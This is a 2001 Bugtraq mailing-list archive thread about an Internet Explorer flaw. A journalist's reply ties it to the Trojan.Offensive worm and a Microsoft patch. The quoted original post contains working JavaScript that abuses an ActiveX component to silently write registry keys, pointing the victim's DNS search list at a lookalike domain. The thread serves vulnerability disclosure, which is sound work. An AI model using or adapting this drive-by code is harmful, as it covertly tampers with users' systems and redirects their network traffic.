Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

RE: javascript can write anything to windows98 registry

From: Rob Lemos <rlemos () zdnet com>
Date: Wed, 29 Aug 2001 08:33:21 -0700
This is the basis for the Trojan.Offensive worm. The problem was originally discovered almost a year ago and was 
patched last November.

Here's the Microsoft link: 
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-075.asp

And my article: http://news.cnet.com/news/0-1003-200-6961705.html

-R

Robert Lemos
Senior writer -- Security, Privacy and e-Crime
ZDNet News/CNet News.com 
PGP key: 0x6E1966EB



 -----Original Message-----
From:         "Marcin Jackowski" <marcin () jackowski net>@INTERNET@INTERLIANT@ZDNET  
Sent: Tuesday, August 28, 2001 8:21 AM
To:   bugtraq () securityfocus com@INTERNET@INTERLIANT@ZDNET
Subject:      javascript can write anything to windows98 registry


 <<...OLE_Obj...>> 

here's code from
www.4y4y.net:88/ls.html
it can write any value to windows98 registry
solution: disable JavaScript in InternetExplorer
tested on IE5.5
Marcin Jackowski
---------------------------------------------------------------
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
    try{
        a1=document.applets[0];
        a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
        a1.createInstance();Shl = a1.GetObject();
        a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
        try{
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-se
rvers.net");
        }
        catch(e){}
    }
    catch(e){}
}
setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
    try{
        a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
        a2.createInstance();Shl =
a2.GetObject();a2.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
            try{
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1");
            }
        catch(e){}
    }
    catch(e){}
}setTimeout("yuzi2()",1000);
</script>


 <<...OLE_Obj...>>  << File: smime.p7s >>
Previous By Date Next
Previous By Thread Next

Current thread: